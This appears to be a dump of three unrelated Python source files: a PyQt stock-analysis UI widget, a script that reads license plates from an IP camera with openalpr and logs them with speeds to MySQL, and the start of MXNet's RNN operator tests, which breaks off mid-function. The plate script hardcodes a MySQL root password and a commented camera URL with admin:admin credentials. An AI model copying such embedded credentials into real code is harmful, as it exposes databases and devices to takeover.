# self.__options & AnalysisTask.OPTION_CALC != 0,
# self.__options & AnalysisTask.OPTION_FROM_CACHE != 0, self.__options & AnalysisTask.OPTION_UPDATE_CACHE != 0,
# self.__options & AnalysisTask.OPTION_LOAD_JSON != 0, self.__options & AnalysisTask.OPTION_DUMP_JSON != 0,
# os.path.join(StockAnalysisSystem().get_project_path(), 'TestData')
# )
#
# if self.__options & AnalysisTask.OPTION_DUMP_JSON != 0 and \
# self.__options & AnalysisTask.OPTION_LOAD_DUMP_ALL != 0:
# clock_dump = Clock()
# name_dict_path = os.path.join(StockAnalysisSystem().get_project_path(),
# 'TestData', 'analyzer_names.json')
# self.__strategy.dump_analysis_report(total_result, full_dump_path)
# self.__strategy.dump_strategy_name_dict(name_dict_path)
# print('Dump all analysis result finished, Time spending: %ss' % clock_dump.elapsed_s())
#
# print('All analysis finished, time spending: %ss' % clock_all.elapsed_s())
# return total_result
#
# def fetch_stock_metrics(self) -> pd.DataFrame or None:
# if self.__options & AnalysisTask.OPTION_ATTACH_BASIC_INDEX == 0:
# return None
#
# daily_metrics = None
# # daily_metrics = self.fetch_metrics_from_web()
# if not isinstance(daily_metrics, pd.DataFrame) or daily_metrics.empty:
# print('Fetch daily metrics data fail, use local.')
# daily_metrics = self.fetch_metrics_from_local()
#
# if not isinstance(daily_metrics, pd.DataFrame) or daily_metrics.empty:
# print('No metrics data.')
# return None
#
# if '_id' in daily_metrics.columns:
# del daily_metrics['_id']
# if 'trade_date' in daily_metrics.columns:
# del daily_metrics['trade_date']
#
# daily_metrics.columns = self.__data_hub.get_data_center().fields_to_readable(list(daily_metrics.columns))
#
# return daily_metrics
#
# def fetch_metrics_from_web(self) -> pd.DataFrame or None:
# trade_calender = self.__data_hub.get_data_center().query_from_plugin('Market.TradeCalender', exchange='SSE',
# trade_date=(days_ago(30), now()))
# if not isinstance(trade_calender, pd.DataFrame) or trade_calender.empty:
# print('Fetch trade calender from web fail.')
# return None
#
# trade_calender = trade_calender[trade_calender['status'] == 1]
# trade_calender = trade_calender.sort_values('trade_date', ascending=False)
# last_trade_date = trade_calender.iloc[1]['trade_date']
#
# daily_metrics = self.__data_hub.get_data_center().query_from_plugin(
# 'Metrics.Stock.Daily', trade_date=(last_trade_date, last_trade_date))
# return daily_metrics
#
# def fetch_metrics_from_local(self) -> pd.DataFrame or None:
# agent = self.__data_hub.get_data_center().get_data_agent('Metrics.Stock.Daily')
# if agent is None:
# print('No data agent for Metrics.Stock.Daily')
# return None
# since, until = agent.data_range('Metrics.Stock.Daily')
# if until is None:
# print('No local metrics data.')
# daily_metrics = self.__data_hub.get_data_center().query_from_local('Metrics.Stock.Daily',
# trade_date=(until, until))
# return daily_metrics
#
# def gen_report(self, result_list: [AnalysisResult], stock_metrics: pd.DataFrame or None):
# clock = Clock()
# self.__strategy.generate_report_excel_common(result_list, self.__report_path, stock_metrics)
# print('Generate report time spending: %ss' % str(clock.elapsed_s()))
#
#
# # ---------------------------------------------------- AnalyzerUi ----------------------------------------------------
class AnalyzerUi(QWidget):
# task_finish_signal = pyqtSignal()
TABLE_HEADER_SELECTOR = ['', 'Selector', 'Comments', 'UUID', 'Status']
TABLE_HEADER_ANALYZER = ['', 'Strategy', 'Comments', 'UUID', 'Status']
def __init__(self, context: UiContext):
super(AnalyzerUi, self).__init__()
self.__context = context
self.__analyzer_info = []
# Thread and task related
self.__selector_list = []
self.__analyzer_list = []
self.__result_output = os.getcwd()
self.__timing_clock = Clock()
# self.task_finish_signal.connect(self.__on_task_done)
# self.__task_res_id = []
self.__current_update_task = None
# Timer for update status
self.__timer = QTimer()
self.__timer.setInterval(1000)
self.__timer.timeout.connect(self.on_timer)
self.__timer.start()
# UI related
group, layout = create_v_group_box('Selector')
self.__group_selector = group
self.__layout_selector = layout
group, layout = create_v_group_box('Analyzer')
self.__group_analyzer = group
self.__layout_analyzer = layout
group, layout = create_v_group_box('Option')
self.__group_option = group
self.__layout_option = layout
group, layout = create_h_group_box('Result')
self.__group_result = group
self.__layout_result = layout
self.__table_selector = TableViewEx()
self.__table_analyzer = TableViewEx()
# self.__radio_group_selector = QButtonGroup(self)
# self.__radio_all = QRadioButton('All')
# self.__radio_tags = QRadioButton('Tags')
# self.__radio_manual = QRadioButton('Manual')
# self.__table_preview = QTableWidget()
self.__check_force_calc = QCheckBox('Force Calc')
self.__check_auto_cache = QCheckBox('Cache Result')
self.__check_load_json = QCheckBox('Load Json')
self.__check_dump_json = QCheckBox('Dump Json')
self.__check_load_dump_all = QCheckBox('Load/Dump All')
self.__datetime_time_since = QDateTimeEdit(years_ago(5))
self.__datetime_time_until = QDateTimeEdit(now())
self.__edit_path = QLineEdit('analysis_report.xlsx')
self.__button_browse = QPushButton('Browse')
self.__button_selector = QPushButton('Selector')
self.__button_analyzer = QPushButton('Analyzer')
self.__button_result = QPushButton('Result')
self.__button_run_strategy = QPushButton('Run Strategy')
self.__check_attach_basic_index = QCheckBox('Attach Basic Index')
self.init_ui()
self.update_selector()
self.update_analyzer()
self.post_progress_updater()
# ---------------------------------------------------- UI Init -----------------------------------------------------
def init_ui(self):
self.__layout_control()
self.__config_control()
def __layout_control(self):
main_layout = QVBoxLayout()
self.setLayout(main_layout)
self.setMinimumSize(600, 400)
self.__layout_selector.addWidget(self.__table_selector)
main_layout.addWidget(self.__group_selector)
self.__layout_analyzer.addWidget(self.__table_analyzer)
main_layout.addWidget(self.__group_analyzer)
self.__layout_result.addWidget(self.__edit_path)
self.__layout_result.addWidget(self.__button_browse)
main_layout.addWidget(self.__group_result)
grid_layout = QGridLayout()
grid_layout.addWidget(self.__check_force_calc, 0, 0)
grid_layout.addWidget(self.__check_auto_cache, 1, 0)
grid_layout.addWidget(self.__check_load_json, 0, 1)
grid_layout.addWidget(self.__check_dump_json, 1, 1)
grid_layout.addWidget(QLabel(' '), 0, 2)
        grid_layout.addWidget(QLabel('    '), 1, 2)
grid_layout.addWidget(QLabel('Since'), 0, 3)
grid_layout.addWidget(QLabel('Until'), 1, 3)
grid_layout.addWidget(self.__datetime_time_since, 0, 4)
grid_layout.addWidget(self.__datetime_time_until, 1, 4)
grid_layout.addWidget(self.__check_attach_basic_index, 2, 0, 3, 1)
grid_layout.addWidget(self.__check_load_dump_all, 2, 1, 3, 1)
self.__layout_option.addLayout(grid_layout)
main_layout.addWidget(self.__group_option)
bottom_control_area = QHBoxLayout()
main_layout.addLayout(bottom_control_area)
bottom_control_area.addWidget(QLabel('Strategy Flow: '), 99)
bottom_control_area.addWidget(self.__button_selector)
bottom_control_area.addWidget(QLabel('==>'))
bottom_control_area.addWidget(self.__button_analyzer)
bottom_control_area.addWidget(QLabel('==>'))
bottom_control_area.addWidget(self.__button_result)
bottom_control_area.addWidget(QLabel(' | '))
bottom_control_area.addWidget(self.__button_run_strategy)
def __config_control(self):
self.__table_selector.SetCheckableColumn(0)
self.__table_selector.SetColumn(AnalyzerUi.TABLE_HEADER_SELECTOR)
self.__table_selector.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.__table_analyzer.SetCheckableColumn(0)
self.__table_analyzer.SetColumn(AnalyzerUi.TABLE_HEADER_ANALYZER)
self.__table_analyzer.horizontalHeader().setSectionResizeMode(QHeaderView.ResizeToContents)
self.__check_auto_cache.setChecked(True)
self.__datetime_time_since.setCalendarPopup(True)
self.__datetime_time_until.setCalendarPopup(True)
        self.__check_force_calc.setToolTip('When checked, cached analysis results are ignored and everything is recalculated in real time.')
        self.__check_auto_cache.setToolTip('When checked, analysis results are automatically cached to the SasCache database.')
        self.__check_load_json.setToolTip('Debug only: load analysis results from a JSON file.')
        self.__check_dump_json.setToolTip('Debug only: dump analysis results to a JSON file.')
        self.__check_load_dump_all.setToolTip('Debug only: load/dump all results at once instead of per analyzer.')
self.__layout_selector.setSpacing(0)
self.__layout_analyzer.setSpacing(0)
self.__layout_option.setSpacing(0)
self.__layout_result.setSpacing(0)
self.__layout_selector.setContentsMargins(0, 0, 0, 0)
self.__layout_analyzer.setContentsMargins(0, 0, 0, 0)
# self.__layout_result.setContentsMargins(0, 0, 0, 0)
self.__button_result.clicked.connect(self.on_button_browse)
self.__button_browse.clicked.connect(self.on_button_browse)
self.__button_selector.clicked.connect(self.on_button_selector)
self.__button_analyzer.clicked.connect(self.on_button_analyzer)
self.__button_run_strategy.clicked.connect(self.on_button_run_strategy)
def on_button_browse(self):
        file_path, _selected_filter = QFileDialog.getSaveFileName(self, 'Select Result Excel Path', '',
                                                                   'XLSX Files (*.xlsx);;All Files (*)')
        # getSaveFileName() returns (file_name, selected_filter); an empty file name means the dialog was cancelled.
        if file_path:
            self.__edit_path.setText(file_path)
def on_button_selector(self):
self.__group_selector.setVisible(True)
self.__group_analyzer.setVisible(not self.__group_analyzer.isVisible())
def on_button_analyzer(self):
self.__group_analyzer.setVisible(True)
self.__group_selector.setVisible(not self.__group_selector.isVisible())
def on_button_run_strategy(self):
selector_list = []
analyzer_list = []
output_path = self.__edit_path.text()
        if len(output_path.strip()) == 0:
            QMessageBox.information(self,
                                    QtCore.QCoreApplication.translate('', 'Missing Configuration'),
                                    QtCore.QCoreApplication.translate('', 'Please specify the result output file.'),
                                    QMessageBox.Close, QMessageBox.Close)
            return
for i in range(self.__table_analyzer.RowCount()):
if self.__table_analyzer.GetItemCheckState(i, 0) == QtCore.Qt.Checked:
uuid = self.__table_analyzer.GetItemText(i, 3)
analyzer_list.append(uuid)
if len(analyzer_list) == 0:
            QMessageBox.information(None, 'Notice', 'Please select at least one analyzer.')
return
self.__selector_list = selector_list
self.__analyzer_list = analyzer_list
self.__result_output = output_path
self.execute_update()
def on_timer(self):
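        # Poll the most recent progress-update task: once it has finished fetching, merge the
        # per-resource ProgressRate objects, refresh the status column of the analyzer table,
        # and either queue another polling round or clean up the resources and report completion.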
if self.__current_update_task is None or self.__current_update_task.working():
return
total_progress = ProgressRate()
updater: ResourceTagUpdater = self.__current_update_task.get_updater()
updated_res_id = updater.get_resource_ids()
done_progress = []
for res_id in updated_res_id:
progress: ProgressRate = updater.get_resource(res_id, 'progress')
if progress is None:
continue
total_progress.combine_with(progress)
if progress.progress_done():
done_progress.append(res_id)
for i in range(self.__table_analyzer.RowCount()):
uuid = self.__table_analyzer.GetItemText(i, 3)
if total_progress.has_progress(uuid):
rate = total_progress.get_progress_rate(uuid)
self.__table_analyzer.SetItemText(i, 4, '%.2f%%' % (rate * 100))
else:
self.__table_analyzer.SetItemText(i, 4, '')
if len(updated_res_id) > 0:
if len(done_progress) != len(updated_res_id):
self.post_progress_updater()
else:
self.__context.get_sas_interface().sas_delete_resource(done_progress)
self.__current_update_task = None
                    # TODO: if the progress was already done at process startup, the message box
                    #       should probably not pop up; currently it always does.
self.__on_analysis_done()
# def closeEvent(self, event):
# if self.__task_thread is not None:
# QMessageBox.information(self,
# QtCore.QCoreApplication.translate('', '无法关闭窗口'),
# QtCore.QCoreApplication.translate('', '策略运行过程中无法关闭此窗口'),
# QMessageBox.Close, QMessageBox.Close)
# event.ignore()
# else:
# event.accept()
# --------------------------------------------------------------------------------------
def update_selector(self):
self.__table_selector.Clear()
self.__table_selector.SetRowCount(0)
self.__table_selector.SetColumn(AnalyzerUi.TABLE_HEADER_SELECTOR)
        self.__table_selector.AppendRow(['', 'All Stocks', 'Only "all stocks" is currently supported; it is also the default when nothing is selected', '-'])
# Add check box
# check_item = QTableWidgetItem()
# check_item.setCheckState(QtCore.Qt.Unchecked)
# self.__table_selector.setItem(0, 0, check_item)
def update_analyzer(self):
self.__table_analyzer.Clear()
self.__table_analyzer.SetRowCount(0)
self.__table_analyzer.SetColumn(AnalyzerUi.TABLE_HEADER_ANALYZER)
self.__analyzer_info = self.__context.get_sas_interface().sas_get_analyzer_probs()
# if len(self.__analyzer_info) == 0:
# self.__analyzer_info = self.__context.get_sas_interface().sas_get_analyzer_probs()
#
for prob in self.__analyzer_info:
line = [
'', # Place holder for check box
prob.get('name', ''),
prob.get('detail', ''),
prob.get('uuid', ''),
'', # Place holder for status
]
self.__table_analyzer.AppendRow(line)
# index = self.__table_analyzer.RowCount() - 1
# Add check box
# check_item = QTableWidgetItem()
# check_item.setCheckState(QtCore.Qt.Unchecked)
# self.__table_analyzer.setItem(index, 0, check_item)
# --------------------------------------------------------------------------
# def load_analyzer_info(self) -> [(str, str, str)]:
# info = []
# probs = self.__strategy_entry.strategy_prob()
# for prob in probs:
# methods = prob.get('methods', [])
# for method in methods:
# method_uuid = method[0]
# method_name = method[1]
# method_detail = method[2]
# method_entry = method[3]
# if method_entry is not None and '测试' not in method_name:
# # Notice the item order
# info.append([method_uuid, method_name, method_detail])
# return info
# --------------------------------- Thread ---------------------------------
def execute_update(self):
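        # Map the option checkboxes onto keyword arguments of sas_execute_analysis()
        # (the commented block below shows the older AnalysisTask flag-based path),
        # then kick off progress polling via post_progress_updater().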
# options = AnalysisTask.OPTION_CALC
#
# if not self.__check_force_calc.isChecked():
# options |= AnalysisTask.OPTION_FROM_CACHE
#
# if self.__check_auto_cache.isChecked():
# options |= AnalysisTask.OPTION_UPDATE_CACHE
#
# if self.__check_load_json.isChecked():
# options |= AnalysisTask.OPTION_LOAD_JSON
# if self.__check_dump_json.isChecked():
# options |= AnalysisTask.OPTION_DUMP_JSON
# if self.__check_load_dump_all.isChecked():
# options |= AnalysisTask.OPTION_LOAD_DUMP_ALL
#
# if self.__check_attach_basic_index.isChecked():
# options |= AnalysisTask.OPTION_ATTACH_BASIC_INDEX
time_serial = (to_py_datetime(self.__datetime_time_since.dateTime()),
to_py_datetime(self.__datetime_time_until.dateTime()))
# self.__timing_clock.reset()
# task = AnalysisTask(self, self.__strategy_entry, self.__data_hub_entry,
# self.__selector_list, self.__analyzer_list, time_serial,
# options, self.__result_output, self.__progress_rate)
# StockAnalysisSystem().get_task_queue().append_task(task)
securities = self.__context.get_sas_interface().sas_get_stock_identities()
self.__context.get_sas_interface().sas_execute_analysis(
securities, self.__analyzer_list, time_serial,
enable_from_cache=not self.__check_force_calc.isChecked(),
enable_update_cache=self.__check_auto_cache.isChecked(),
debug_load_json=self.__check_load_json.isChecked(),
debug_dump_json=self.__check_dump_json.isChecked() or self.__check_load_dump_all.isChecked(),
dump_path=self.__result_output,
attach_basic_index=self.__check_attach_basic_index.isChecked(),
generate_report=True, # The report will be generated on server side.
)
self.post_progress_updater()
# self.__task_res_id.append(res_id)
# self.__context.get_res_sync().add_sync_resource(res_id, 'progress')
# if self.__task_thread is None:
# self.__task_thread = threading.Thread(target=self.ui_task)
# StockAnalysisSystem().lock_sys_quit()
# self.__timing_clock.reset()
# self.__task_thread.start()
# else:
# print('Task already running...')
# QMessageBox.information(self,
# QtCore.QCoreApplication.translate('', '无法执行'),
# QtCore.QCoreApplication.translate('', '已经有策略在运行中,无法同时运行多个策略'),
# QMessageBox.Close, QMessageBox.Close)
# def ui_task(self):
# print('Strategy task start.')
#
# self.__lock.acquire()
# selector_list = self.__selector_list
# analyzer_list = self.__analyzer_list
# output_path = self.__result_output
# self.__lock.release()
#
# data_utility = self.__data_hub_entry.get_data_utility()
# stock_list = data_utility.get_stock_identities()
#
# self.__progress_rate.reset()
#
# # ------------- Run analyzer -------------
# clock = Clock()
#
# # result = self.__strategy_entry.run_strategy(stock_list, analyzer_list, progress=self.__progress_rate)
#
# total_result = []
# uncached_analyzer = []
#
# for analyzer in analyzer_list:
# result = self.__strategy_entry.result_from_cache('Result.Analyzer', analyzer=analyzer)
# if result is None or len(result) == 0:
# uncached_analyzer.append(analyzer)
# result = self.__strategy_entry.run_strategy(stock_list, [analyzer], progress=self.__progress_rate)
# else:
# self.__progress_rate.finish_progress(analyzer)
# if result is not None and len(result) > 0:
# total_result.extend(result)
#
# # DEBUG: Load result from json file
# # result = None
# # with open('analysis_result.json', 'rt') as f:
# # result = analysis_results_from_json(f)
# # if result is None:
# # return
#
# print('Analysis time spending: ' + str(clock.elapsed_s()) + ' s')
#
# # # DEBUG: Dump result to json file
# # with open('analysis_result.json', 'wt') as f:
# # analysis_results_to_json(result, f)
#
# # self.__strategy_entry.cache_analysis_result('Result.Analyzer', result)
# result2 = self.__strategy_entry.result_from_cache('Result.Analyzer')
# print(result2)
#
# result = analysis_result_dataframe_to_list(result2)
# print(result)
#
# # ------------ Parse to Table ------------
#
# result_table = analysis_result_list_to_analyzer_security_table(result)
#
# # ----------- Generate report ------------
# clock.reset()
# stock_list = self.__data_hub_entry.get_data_utility().get_stock_list()
# stock_dict = {_id: _name for _id, _name in stock_list}
# name_dict = self.__strategy_entry.strategy_name_dict()
# generate_analysis_report(result_table, output_path, name_dict, stock_dict)
# print('Generate report time spending: ' + str(clock.elapsed_s()) + ' s')
#
# # ----------------- End ------------------
# self.task_finish_signal.emit()
# print('Update task finished.')
# ---------------------------------------------------------------------------------
# def notify_task_done(self):
# self.task_finish_signal.emit()
# def __on_task_done(self):
# # StockAnalysisSystem().release_sys_quit()
# QMessageBox.information(self,
# QtCore.QCoreApplication.translate('main', '远行完成'),
# QtCore.QCoreApplication.translate('main', '策略运行完成,耗时' +
# str(self.__timing_clock.elapsed_s()) + '秒\n' +
# '报告生成路径:' + self.__result_output),
# QMessageBox.Ok, QMessageBox.Ok)
def __on_analysis_done(self):
        QMessageBox.information(self,
                                QtCore.QCoreApplication.translate('main', 'Analysis Finished'),
                                QtCore.QCoreApplication.translate('main', 'Strategy run finished, took ' +
                                                                  str(self.__timing_clock.elapsed_s()) + ' seconds.\n' +
                                                                  'Please fetch analysis_report.xlsx from the service directory.'),
                                QMessageBox.Ok, QMessageBox.Ok)
def post_progress_updater(self):
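        # Queue a ResourceUpdateTask that pulls the 'progress' field of every resource
        # tagged 'analysis_task'; on_timer() periodically consumes its result.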
updater = ResourceTagUpdater(self.__context.get_sas_interface(), 'Analysis Progress Updater')
updater.set_resource_tags('analysis_task')
updater.set_update_resource_keys('progress')
update_task = ResourceUpdateTask(updater)
self.__context.get_task_queue().append_task(update_task)
self.__current_update_task = update_task
# ----------------------------------------------------------------------------------------------------------------------
def main():
from StockAnalysisSystem.interface.interface_local import LocalInterface
project_path = os.path.dirname(os.path.dirname(os.getcwd()))
local_if = LocalInterface()
local_if.if_init(project_path=project_path)
context = UiContext()
context.set_sas_interface(local_if)
app = QApplication(sys.argv)
dlg = WrapperQDialog(AnalyzerUi(context))
dlg.exec()
# ----------------------------------------------------------------------------------------------------------------------
def exception_hook(type, value, tback):
# log the exception here
print('Exception hook triggered.')
print(type)
print(value)
print(tback)
# then call the default handler
sys.__excepthook__(type, value, tback)
if __name__ == "__main__":
sys.excepthook = exception_hook
try:
main()
except Exception as e:
print('Error =>', e)
print('Error =>', traceback.format_exc())
exit()
finally:
pass
|
datacapture.py
|
#mysql connection
from __future__ import print_function
from datetime import date, datetime, timedelta
import mysql.connector as mconn
from mysql.connector import errorcode as errcode
#program-related stuff
from subprocess import Popen, PIPE
import json
from pprint import pprint
import numpy as np
import cv2
import threading
#scan_plates()
#Runs a shell command and yields its stdout line by line (as bytes) until an empty line / EOF.
def run(command):
process = Popen(command, stdout=PIPE, shell=True)
while True:
line = process.stdout.readline().rstrip()
if not line:
break
yield line
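#Usage sketch (illustrative only, not called anywhere): the yielded lines are bytes
#and must be decoded by the caller, e.g.
#    for raw_line in run("echo hello"):
#        print(raw_line.decode("utf-8"))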
#def process_output(output):
### RECORDS SPEED DATA INTO THE DATABASE ###
#NOTE: this opens a new connection per call and runs a single INSERT, so it is slow;
#ideally run it on a background thread so it does not block the capture loop.
def record_data(plate,speed):
cnx = mconn.connect(user='root',password='Rachel17.dopadopa',host='127.0.0.1',database='platecontainer')
cursor = cnx.cursor()
add_plates = ("INSERT INTO plate_record (plate_no,date_record,est_speed) values (%s,%s,%s) ON DUPLICATE KEY UPDATE date_record=%s,est_speed=%s")
data_plates = (plate,datetime.now(),speed,datetime.now(),speed)
cursor.execute(add_plates,data_plates)
cnx.commit()
cursor.close()
cnx.close()
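#A minimal sketch (not part of the original flow): run record_data() on a daemon thread
#so the INSERT does not block the capture loop, as the note above suggests. The helper
#name record_data_async is hypothetical.
def record_data_async(plate, speed):
    worker = threading.Thread(target=record_data, args=(plate, speed))
    worker.daemon = True
    worker.start()
    return worker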
### DEBUG CODE -- DO NOT ENABLE IF YOU DON'T KNOW WHAT YOU'RE DOING###
#def parse_json_data(output):
#def process_results(results):
#def disp_cam():
#cap = cv2.VideoCapture('http://192.168.254.105:8080/video')
#cap = cv2.VideoCapture('rtsp://admin:admin@192.168.0.108/live')
#while(cap.isOpened()):
#ret, frame = cap.read()
#gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#cv2.line(frame,(0,0),(511,511),(255,0,0),5)
#img = frame.array
#cv2.namedWindow("frame",cv2.WINDOW_NORMAL)
#cv2.resizeWindow('frame',520,520)
#cv2.imshow('frame',frame)
#if cv2.waitKey(1) & 0xFF == ord('q'):
# break
#cap.release()
#cv2.destroyAllWindows()
def scan_plates():
    #Open the video stream used for displaying and annotating frames.
    #Adjust the URL to match the IP camera providing the stream.
cap = cv2.VideoCapture('http://192.168.43.220:8080/video')#'http://192.168.254.106:8080/video')
    #We use openalpr to detect the plates; it returns JSON with the plate text,
    #confidence candidates and coordinates, which are used below.
for path in run("alpr -j -n 1 http://192.168.43.220:8080/video"):#http://192.168.254.106:8080/video"):
#decode the received response from the execution of the bash code above.
output = path.decode("utf-8")
#Initialize the video frame.
ret, frame = cap.read()
#gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if "connecting" in output:
print("Connecting to video stream...")
elif "connected" in output:
print("Connected to video stream. Checking plates.")
else:
            #Parse the response string as JSON so its fields can be accessed as a dict.
jsondata = json.loads(output)
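            #Shape consumed below (roughly): {"results": [{"plate": ..., "candidates": [...],
            #                                              "coordinates": [{"x": .., "y": ..} * 4], ...}]}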
#If there are results presented by openalpr, we process them
if jsondata["results"]:
for data in jsondata["results"]:
                    #Take the first candidate, which openalpr ranks as the highest-confidence match.
results = data["candidates"][0]
#We then fetch the coordinates of the plate number detected.
coordinates = data["coordinates"]
                    #The coordinates contain four points, which describe a four-sided polygon:
coord1 = coordinates[0]
coord2 = coordinates[1]
coord3 = coordinates[2]
coord4 = coordinates[3]
# Initialization of the coordinates extracted from openalpr.
# We initialize the coordinates as an array.
pts = np.array([(coord1["x"],coord1["y"]),(coord2["x"],coord2["y"]),(coord3["x"],coord3["y"]),(coord4["x"],coord4["y"])], np.int32)
pts = pts.reshape((-1,1,2))
                    #Draw a closed polygon through the four vertices (not necessarily a rectangle).
cv2.polylines(frame,[pts],True,(255,0,0),thickness=2,lineType=8,shift=0)
                    #Draw the plate text at the fourth coordinate (the lower-left corner of the detection).
cv2.putText(frame,results["plate"],(coord4["x"],coord4["y"]),cv2.FONT_HERSHEY_TRIPLEX,1,1)
#save file to the folder where the script was executed
cv2.imwrite("img_"+results["plate"]+".jpg",frame)
                    #Record the plate and the latest speed estimate to the database.
with open('spd.data', 'r') as myfile:
data=myfile.read().replace('\n', '')
data = data.strip()
speedval = float(data)
record_data(results["plate"],speedval)
### DEBUG CODE -- DO NOT ENABLE IF YOU DON'T KNOW WHAT YOU'RE DOING###
#cv2.rectangle(frame,(coord1["x"],coord1["y"]),(coord2["x"],coord2["y"]),(coord3["x"],coord3["y"]),5)
#print(coordinates[0]["x"])
### DEBUG CODE -- DO NOT ENABLE IF YOU DON'T KNOW WHAT YOU'RE DOING###
#cv2.line(frame,(0,0),(511,511),(255,0,0),5)
#img = frame.array
#cv2.namedWindow("Plate Number Scanner",cv2.WINDOW_NORMAL)
#cv2.resizeWindow('frame',520,520)
cv2.imshow('Plate Number Scanner',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
#print(path.decode("utf-8"))
cv2.line(frame,(0,0),(511,511),(255,0,0),5)
if __name__ == "__main__":
global frame
#global cnx
#global cursor
### DEBUG CODE -- DO NOT ENABLE IF YOU DON'T KNOW WHAT YOU'RE DOING###
#t1 = threading.Thread(target=scan_plates)
#t1.daemon = False
#t1.start()
    # Run directly on the main thread; the capture loop blocks anyway.
#initialize_database()
scan_plates()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import xfail_when_nonstandard_decimal_separator, with_environment
import pytest
import os
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
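            # Size of the fused RNN parameter blob: per gate, the first layer holds
            # input-to-hidden weights (input_size * state_size), hidden-to-hidden weights
            # (state_size * state_size) and two bias vectors (state_size * 2); the remaining
            # layers take state_size * directions inputs instead.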
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym._bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym._bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
